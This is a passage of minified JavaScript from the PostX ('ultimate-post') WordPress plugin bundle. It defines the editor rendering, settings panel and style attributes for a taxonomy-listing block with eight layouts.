t=g(null),[l,k]=m("Content"),[w,x]=m({postsList:[],loading:!0,error:!1}),{setAttributes:T,name:_,clientId:C,className:E,attributes:S,attributes:{blockId:P,advanceId:L,taxGridEn:I,headingText:B,headingStyle:U,headingShow:M,headingAlign:A,headingURL:H,headingBtnText:N,subHeadingShow:j,subHeadingText:Z,taxType:O,previewImg:R,layout:D,headingTag:z,countShow:F,titleShow:W,excerptShow:V,TaxAnimation:G,columns:q,customTaxTitleColor:$,customTaxColor:K,imgCrop:J,titleTag:Y,notFoundMessage:X,V4_1_0_CompCheck:{runComp:Q},currentPostId:ee,taxSlug:te,taxValue:le,queryNumber:oe}}=e;function ae(){w.error&&x({...w,error:!1}),w.loading||x({...w,loading:!0}),wp.apiFetch({path:"/ultp/specific_taxonomy",method:"POST",data:{taxValue:le,queryNumber:oe,taxType:O,taxSlug:te,wpnonce:ultp_data.security,archiveBuilder:"archive"==ultp_data.archive?ultp_data.archive:""}}).then((e=>{x({...w,postsList:e,loading:!1})})).catch((e=>{x({...w,loading:!1,error:!0})}))}d((()=>{ae()}),[]),d((()=>{const e=t.current;e?(0,a.Qr)(e,S)&&(ae(),t.current=S):t.current=S}),[S]),d((()=>{const t=C.substr(0,6),l=h(f(C));(0,a.qi)(T,l,ee,C),(0,s.h)(e),P?P&&P!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||T({blockId:t})):T({blockId:t})}),[C]);const ie={setAttributes:T,name:_,attributes:S,setSection:k,section:l,clientId:C};let ne;P&&(ne=(0,i.Kh)(S,"ultimate-post/ultp-taxonomy",P,(0,a.k0)()));const re=c({...L&&{id:L},className:`ultp-block-${P} ${E}`});return(0,o.createElement)(y,null,(0,o.createElement)(u,null,(0,o.createElement)(p.Z,{runComp:Q,store:ie})),(0,o.createElement)(n.Z,{include:[{type:"query",taxQuery:!0},{type:"template"},{type:"layout",block:"ultp-taxonomy",key:"layout",options:[{img:"assets/img/layouts/taxonomy/l1.png",label:__("Layout 1","ultimate-post"),value:"1",pro:!1},{img:"assets/img/layouts/taxonomy/l2.png",label:__("Layout 2","ultimate-post"),value:"2",pro:!0},{img:"assets/img/layouts/taxonomy/l3.png",label:__("Layout 3","ultimate-post"),value:"3",pro:!0},{img:"assets/img/layouts/taxonomy/l4.png",label:__("Layout 4","ultimate-post"),value:"4",pro:!0},{img:"assets/img/layouts/taxonomy/l5.png",label:__("Layout 5","ultimate-post"),value:"5",pro:!0},{img:"assets/img/layouts/taxonomy/l6.png",label:__("Layout 6","ultimate-post"),value:"6",pro:!0},{img:"assets/img/layouts/taxonomy/l7.png",label:__("Layout 7","ultimate-post"),value:"7",pro:!0},{img:"assets/img/layouts/taxonomy/l8.png",label:__("Layout 8","ultimate-post"),value:"8",pro:!0}]}],store:ie}),(0,o.createElement)("div",re,ne&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:ne}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},M&&(0,o.createElement)("div",{className:"ultp-heading-filter"},(0,o.createElement)("div",{className:"ultp-heading-filter-in"},(0,o.createElement)(r.Z,{props:{headingShow:M,headingStyle:U,headingAlign:A,headingURL:H,headingText:B,setAttributes:T,headingBtnText:N,subHeadingShow:j,subHeadingText:Z,headingTag:z}}))),function(){const e=Y;return R?(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:R}):w.error?(0,o.createElement)(v,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):w.loading?(0,o.createElement)(v,{label:__("Loading…","ultimate-post")},(0,o.createElement)(b,null)):w.postsList.length>0?(0,o.createElement)("div",{className:"ultp-block-items-wrap"},(0,o.createElement)("ul",{className:`ultp-taxonomy-items ${"none"!=G?"ultp-taxonomy-animation-"+G:""} ultp-taxonomy-column-${q.lg} ultp-taxonomy-layout-${D}`},w.postsList.map(((t,l)=>{const a=t.image?{backgroundImage:`url(${t.image[J]})`}:{background:`${t.color}`};return(0,o.createElement)("li",{key:l,className:"ultp-block-item ultp-taxonomy-item"},1==D&&(0,o.createElement)(y,null,(0,o.createElement)("a",{href:"#"},W&&(0,o.createElement)(e,{className:"ultp-taxonomy-name",style:$?{color:t.color}:{}},t.name),F&&(0,o.createElement)("span",{className:"ultp-taxonomy-count",style:$?{color:t.color}:{}},t.count),V&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc))),2==D&&(0,o.createElement)(y,null,(0,o.createElement)("a",{href:"#",style:a},(0,o.createElement)("div",{className:"ultp-taxonomy-lt2-overlay",style:K?{backgroundColor:t.color}:{}}),(0,o.createElement)("div",{className:"ultp-taxonomy-lt2-content"},W&&(0,o.createElement)(y,null,(0,o.createElement)(e,{className:"ultp-taxonomy-name"},t.name),(0,o.createElement)("span",{className:"ultp-taxonomy-bar"})),F&&(0,o.createElement)("span",{className:"ultp-taxonomy-count"},t.count)),V&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc))),3==D&&(0,o.createElement)("a",{href:"#"},(0,o.createElement)("div",{className:"ultp-taxonomy-lt3-img",style:a}),(0,o.createElement)("div",{className:"ultp-taxonomy-lt3-overlay",style:K?{backgroundColor:t.color}:{}}),(0,o.createElement)("div",{className:"ultp-taxonomy-lt3-content"},W&&(0,o.createElement)(y,null,(0,o.createElement)(e,{className:"ultp-taxonomy-name"},t.name),(0,o.createElement)("span",{className:"ultp-taxonomy-bar"})),F&&(0,o.createElement)("span",{className:"ultp-taxonomy-count"},t.count)),V&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc)),4==D&&(0,o.createElement)("a",{href:"#"},t.image&&t.image.full&&(0,o.createElement)("img",{src:t?.image[J],alt:t.name}),(0,o.createElement)("div",{className:"ultp-taxonomy-lt4-content"},W&&(0,o.createElement)(e,{className:"ultp-taxonomy-name",style:$?{color:t.color}:{}},t.name),F&&(0,o.createElement)("span",{className:"ultp-taxonomy-count",style:$?{color:t.color}:{}},t.count)),V&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc)),5==D&&(0,o.createElement)("a",{href:"#"},t.image&&t.image.full&&(0,o.createElement)("img",{src:t?.image[J],alt:t.name}),(0,o.createElement)("span",{className:"ultp-taxonomy-lt5-content"},W&&(0,o.createElement)(e,{className:"ultp-taxonomy-name",style:$?{color:t.color}:{}},t.name),F&&(0,o.createElement)("span",{className:"ultp-taxonomy-count",style:$?{color:t.color}:{}},t.count),V&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc))),6==D&&(0,o.createElement)("a",{href:"#",style:a},(0,o.createElement)("div",{className:"ultp-taxonomy-lt6-overlay",style:K?{backgroundColor:t.color}:{}}),W&&(0,o.createElement)(e,{className:"ultp-taxonomy-name"},t.name),F&&(0,o.createElement)("span",{className:"ultp-taxonomy-count"},t.count),V&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc)),7==D&&(0,o.createElement)("a",{href:"#",style:a},(0,o.createElement)("div",{className:"ultp-taxonomy-lt7-overlay",style:K?{backgroundColor:t.color}:{}}),W&&(0,o.createElement)(e,{className:"ultp-taxonomy-name",style:$?{backgroundColor:t.color}:{}},t.name,F&&(0,o.createElement)("span",{className:"ultp-taxonomy-count"},t.count)),V&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc)),8==D&&(0,o.createElement)("a",{href:"#",style:a},(0,o.createElement)("div",{className:"ultp-taxonomy-lt8-overlay",style:K?{backgroundColor:t.color}:{}}),W&&(0,o.createElement)(e,{className:"ultp-taxonomy-name",style:$?{backgroundColor:t.color}:{}},t.name,F&&(0,o.createElement)("span",{className:"ultp-taxonomy-count"},t.count)),V&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc)))})))):(0,o.createElement)(v,{label:X})}())))}},62453:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,r=({store:e,runComp:t})=>{const{layout:l,taxGridEn:r}=e.attributes;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6841",store:e}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.If,{store:e,initialOpen:!0,exclude:["contentAlign","openInTab","contentTag","notFoundMessage"],include:[{position:1,data:{type:"layout",block:"ultp-taxonomy",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/taxonomy/l1.png",label:__("Layout 1","ultimate-post"),value:"1",pro:!1},{img:"assets/img/layouts/taxonomy/l2.png",label:__("Layout 2","ultimate-post"),value:"2",pro:!0},{img:"assets/img/layouts/taxonomy/l3.png",label:__("Layout 3","ultimate-post"),value:"3",pro:!0},{img:"assets/img/layouts/taxonomy/l4.png",label:__("Layout 4","ultimate-post"),value:"4",pro:!0},{img:"assets/img/layouts/taxonomy/l5.png",label:__("Layout 5","ultimate-post"),value:"5",pro:!0},{img:"assets/img/layouts/taxonomy/l6.png",label:__("Layout 6","ultimate-post"),value:"6",pro:!0},{img:"assets/img/layouts/taxonomy/l7.png",label:__("Layout 7","ultimate-post"),value:"7",pro:!0},{img:"assets/img/layouts/taxonomy/l8.png",label:__("Layout 8","ultimate-post"),value:"8",pro:!0}]}},{position:2,data:{type:"toggle",key:"taxGridEn",label:__("Grid View","ultimate-post"),pro:!0}},{position:3,data:{type:"range",key:"columns",min:1,max:7,step:1,responsive:!0,label:__("Columns","ultimate-post")}},{position:4,data:{type:"range",key:"columnGridGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Column Gap","ultimate-post")}},{position:5,data:{type:"range",key:"rowGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Row Gap","ultimate-post")}},{data:{type:"text",key:"notFoundMessage",label:__("No result found Text","ultimate-post")}}]}),(0,o.createElement)(a.$o,{store:e}),!t&&(0,o.createElement)(a.Wh,{store:e,depend:"headingShow"}),("4"==l||"5"==l)&&(0,o.createElement)(a.Hn,{store:e,exclude:["imgMargin","imgCropSmall","imgAnimation","imgOverlay","imgOpacity","overlayColor","imgOverlayType","imgGrayScale","imgHoverGrayScale","imgShadow","imgHoverShadow","imgTab","imgHoverRadius","imgRadius","imgSrcset","imgLazy","imageScale"],include:[{position:3,data:{type:"alignment",key:"contentAlign",responsive:!1,label:__("Alignment","ultimate-post"),disableJustify:!0}},{position:2,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}]}),("1"==l||"4"==l||"5"==l)&&(0,o.createElement)(a.O2,{store:e,exclude:["contenWraptWidth","contenWraptHeight","contentWrapInnerPadding"],include:[{position:0,data:{type:"select",key:"TaxAnimation",label:__("Hover Animation","ultimate-post"),options:[{value:"none",label:__("No Animation","ultimate-post")},{value:"zoomIn",label:__("Zoom In","ultimate-post")},{value:"zoomOut",label:__("Zoom Out","ultimate-post")},{value:"opacity",label:__("Opacity","ultimate-post")},{value:"slideLeft",label:__("Slide Left","ultimate-post")},{value:"slideRight",label:__("Slide Right","ultimate-post")}]}}]}),("2"==l||"3"==l||"6"==l||"7"==l||"8"==l)&&(0,o.createElement)(a.HY,{store:e}),(0,o.createElement)(a.VH,{depend:"titleShow",store:e,exclude:["titlePosition","titleLength","titleBackground","titleStyle","titleAnimColor"],include:[{position:0,data:{type:"toggle",key:"customTaxTitleColor",label:__("Specific Color","ultimate-post"),pro:!0}},{position:1,data:{type:"alignment",key:"contentTitleAlign",responsive:!1,label:__("Title Align","ultimate-post"),disableJustify:!0}},{position:2,data:{type:"linkbutton",key:"seperatorTaxTitleLink",placeholder:__("Choose Color","ultimate-post"),label:__("Taxonomy Specific (Pro)","ultimate-post"),text:"Choose Color"}},{position:5,data:{type:"color",key:"TitleBgColor",label:__("Background Color","ultimate-post")}},{position:6,data:{type:"color",key:"TitleBgHoverColor",label:__("Hover Background Color","ultimate-post")}},{position:7,data:{type:"color",key:"titleDotColor",label:__("Border Color","ultimate-post")}},{position:8,data:{type:"color",key:"titleDotHoverColor",label:__("Border Hover Color","ultimate-post")}},{position:9,data:{type:"range",key:"titleDotSize",label:__("Border Size","ultimate-post"),min:0,max:5,step:1}},{position:10,data:{type:"select",key:"titleDotStyle",label:__("Border Style","ultimate-post"),options:[{value:"none",label:__("None","ultimate-post")},{value:"solid",label:__("Solid","ultimate-post")},{value:"dashed",label:__("Dashed","ultimate-post")},{value:"dotted",label:__("Dotted","ultimate-post")},{value:"double",label:__("Double","ultimate-post")}]}},{position:11,data:{type:"range",key:"titleRadius",min:0,max:300,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Border Radius","ultimate-post")}}]}),(0,o.createElement)(a.X_,{isTab:!0,store:e,depend:"excerptShow",exclude:["showSeoMeta","excerptLimit","showFullExcerpt"]}),(0,o.createElement)(a.wT,{store:e,depend:"countShow"}),!r&&(0,o.createElement)(a.Yp,{depend:"separatorShow",store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}},60816:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(92165),a=l(73151);const i={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"1"},taxGridEn:{type:"boolean",default:!0},columns:{type:"object",default:{lg:"1"},style:[{depends:[{key:"taxGridEn",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-items { grid-template-columns: repeat({{columns}}, 1fr); }"}]},columnGridGap:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"taxGridEn",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-items { grid-column-gap: {{columnGridGap}}; } \n          {{ULTP}} .ultp-taxonomy-item { margin-bottom: 0; }"}]},rowGap:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"taxGridEn",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-items { grid-row-gap: {{rowGap}}; }"}]},titleShow:{type:"boolean",default:!0},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!1},countShow:{type:"boolean",default:!0},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Taxonomy Found."},taxType:{type:"string",default:"regular"},taxSlug:{type:"string",default:"category"},taxValue:{type:"string",default:"[]",style:[{depends:[{key:"taxType",condition:"!=",value:["parent","regular"]}]}]},queryNumber:{type:"string",default:6,style:[{depends:[{key:"taxType",condition:"!=",value:"custom"}]}]},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape"},imgWidth:{type:"object",default:{lg:"",ulg:"%"},style:[{depends:[{key:"layout",condition:"==",value:["4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-4 a img, \n          {{ULTP}} .ultp-taxonomy-layout-5 a img { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:["4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-4 a img,  \n          {{ULTP}} .ultp-taxonomy-layout-5 a img {object-fit: cover; height: {{imgHeight}}; }"}]},imgSpacing:{type:"object",default:{lg:""},style:[{depends:[{key:"layout",condition:"==",value:["4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-4 a img,  \n          {{ULTP}} .ultp-taxonomy-layout-5 a img { margin-bottom: {{imgSpacing}}px; }"}]},contentAlign:{type:"string",default:"center",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-taxonomy-layout-5 li a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 li a { text-align:{{contentAlign}}; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-taxonomy-layout-5 li a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 li a { text-align:{{contentAlign}}; justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-taxonomy-layout-5 li a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 li a { text-align:{{contentAlign}}; justify-content: flex-end; }"}]},contentWrapBg:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-item a .ultp-taxonomy-lt5-content { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-item a:hover .ultp-taxonomy-lt5-content { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-5 .ultp-taxonomy-item a"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-5 .ultp-taxonomy-item a:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-5 .ultp-taxonomy-item a { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-5 .ultp-taxonomy-item a:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a,  \n          {{ULTP}} .ultp-taxonomy-layout-5 .ultp-taxonomy-item a"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a:hover,  \n          {{ULTP}} .ultp-taxonomy-layout-5 .ultp-taxonomy-item a:hover"}]},contentWrapPadding:{type:"object",default:{lg:{unit:"px",top:"6",right:"12",bottom:"6",left:"12"}},style:[{depends:[{key:"layout",condition:"==",value:["1","4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-1 .ultp-taxonomy-item a,\n          {{ULTP}} .ultp-taxonomy-layout-4 .ultp-taxonomy-item a,\n          {{ULTP}} .ultp-taxonomy-item a .ultp-taxonomy-lt5-content { padding: {{contentWrapPadding}}; }"}]},customTaxColor:{type:"boolean",default:!1},seperatorTaxLink:{type:"string",default:ultp_data.category_url,style:[{depends:[{key:"customTaxColor",condition:"==",value:!0}]}]},TaxAnimation:{type:"string",default:"none"},TaxWrapBg:{type:"string",default:"",style:[{depends:[{key:"customTaxColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-items li a .ultp-taxonomy-lt2-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a .ultp-taxonomy-lt3-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a .ultp-taxonomy-lt6-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a .ultp-taxonomy-lt7-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a .ultp-taxonomy-lt8-overlay { background:{{TaxWrapBg}}; }"}]},TaxWrapHoverBg:{type:"string",style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]},{key:"customTaxColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-items a:hover .ultp-taxonomy-lt2-overlay,\n          {{ULTP}} .ultp-taxonomy-items a:hover .ultp-taxonomy-lt3-overlay, \n          {{ULTP}} .ultp-taxonomy-items a:hover .ultp-taxonomy-lt6-overlay,  \n          {{ULTP}} .ultp-taxonomy-items a:hover .ultp-taxonomy-lt7-overlay,  \n          {{ULTP}} .ultp-taxonomy-items a:hover .ultp-taxonomy-lt8-overlay { background:{{TaxWrapHoverBg}}; }"}]},TaxWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a"}]},TaxWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a:hover"}]},TaxWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a"}]},TaxWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a:hover"}]},TaxWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a { border-radius: {{TaxWrapRadius}}; }"}]},TaxWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a:hover { border-radius: {{TaxWrapHoverRadius}}; }"}]},customOpacityTax:{type:"string",default:.6,style:[{selector:"{{ULTP}} .ultp-taxonomy-lt2-overlay,  \n          {{ULTP}} .ultp-taxonomy-lt3-overlay,  \n          {{ULTP}} .ultp-taxonomy-lt6-overlay,  \n          {{ULTP}} .ultp-taxonomy-lt7-overlay,  \n          {{ULTP}} .ultp-taxonomy-lt8-overlay { opacity: {{customOpacityTax}}; }"}]},customTaxOpacityHover:{type:"string",default:.9,style:[{selector:"{{ULTP}} .ultp-taxonomy-items li a:hover .ultp-taxonomy-lt2-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a:hover .ultp-taxonomy-lt3-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a:hover .ultp-taxonomy-lt6-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a:hover .ultp-taxonomy-lt7-overlay,  \n          {{ULTP}} .ultp-taxonomy-items li a:hover .ultp-taxonomy-lt8-overlay { opacity: {{customTaxOpacityHover}}; }"}]},TaxWrapPadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:["2","3","6","7","8"]}],selector:"{{ULTP}} .ultp-taxonomy-item a { padding: {{TaxWrapPadding}}; }"}]},titleTag:{type:"string",default:"span"},contentTitleAlign:{type:"string",default:"left",style:[{depends:[{key:"layout",condition:"==",value:"1"},{key:"countShow",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-items-wrap ul li a { justify-content: {{contentTitleAlign}};}"}]},titlePosition:{type:"boolean",default:!0},customTaxTitleColor:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"!=",value:["2","3","6"]}]}]},seperatorTaxTitleLink:{type:"string",default:ultp_data.category_url,style:[{depends:[{key:"customTaxTitleColor",condition:"==",value:!0},{key:"layout",condition:"!=",value:["2","3","6"]}]}]},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"customTaxTitleColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-name { color:{{titleColor}}; }"},{depends:[{key:"layout",condition:"==",value:["2","3","6"]}],selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-name { color:{{titleColor}}; }"}]},TitleBgColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"layout",condition:"==",value:["7","8"]},{key:"customTaxTitleColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-taxonomy-layout-7 .ultp-taxonomy-name,  \n          {{ULTP}} .ultp-taxonomy-layout-8 .ultp-taxonomy-name { background:{{TitleBgColor}}; }"}]},TitleBgHoverColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"layout",condition:"==",value:["7","8"]},{key:"customTaxTitleColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-taxonomy-layout-7 li a:hover .ultp-taxonomy-name,  \n          {{ULTP}} .ultp-taxonomy-layout-8 li a:hover .ultp-taxonomy-name { background:{{TitleBgHoverColor}}; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-block-item a:hover .ultp-taxonomy-name,  \n          {{ULTP}} .ultp-block-item a:hover .ultp-taxonomy-count { color:{{titleHoverColor}}!important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"22",unit:"px"},transform:"",decoration:"none",family:"",weight:""},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-name"}]},titleDotColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"layout",condition:"==",value:["2","3"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-2 .ultp-taxonomy-bar,  \n          {{ULTP}} .ultp-taxonomy-layout-3 .ultp-taxonomy-bar { border-bottom-color:{{titleDotColor}}; }"}]},titleDotHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"layout",condition:"==",value:["2","3"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-2 li:hover a .ultp-taxonomy-bar,  \n          {{ULTP}} .ultp-taxonomy-layout-3 li:hover a .ultp-taxonomy-bar { border-bottom-color:{{titleDotHoverColor}}; }"}]},titleDotSize:{type:"string",default:"solid",style:[{depends:[{key:"layout",condition:"==",value:["2","3"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-2 .ultp-taxonomy-bar,  \n          {{ULTP}} .ultp-taxonomy-layout-3 .ultp-taxonomy-bar { border-bottom-width:{{titleDotSize}}px; }"}]},titleDotStyle:{type:"string",default:{lg:"1"},style:[{depends:[{key:"layout",condition:"==",value:["2","3"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-2 .ultp-taxonomy-bar,  \n          {{ULTP}} .ultp-taxonomy-layout-3 .ultp-taxonomy-bar { border-bottom-style: {{titleDotStyle}}; }"}]},titlePadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-name { padding:{{titlePadding}}; }"}]},titleRadius:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"titleShow",condition:"==",value:!0},{key:"layout",condition:"==",value:["7","8"]}],selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-name { border-radius:{{titleRadius}}; }"}]},excerptLimit:{type:"string",default:30},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-taxonomy-desc { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"22",unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-desc"}]},excerptPadding:{type:"object",default:{lg:{top:"0",bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-desc { padding: {{excerptPadding}}; 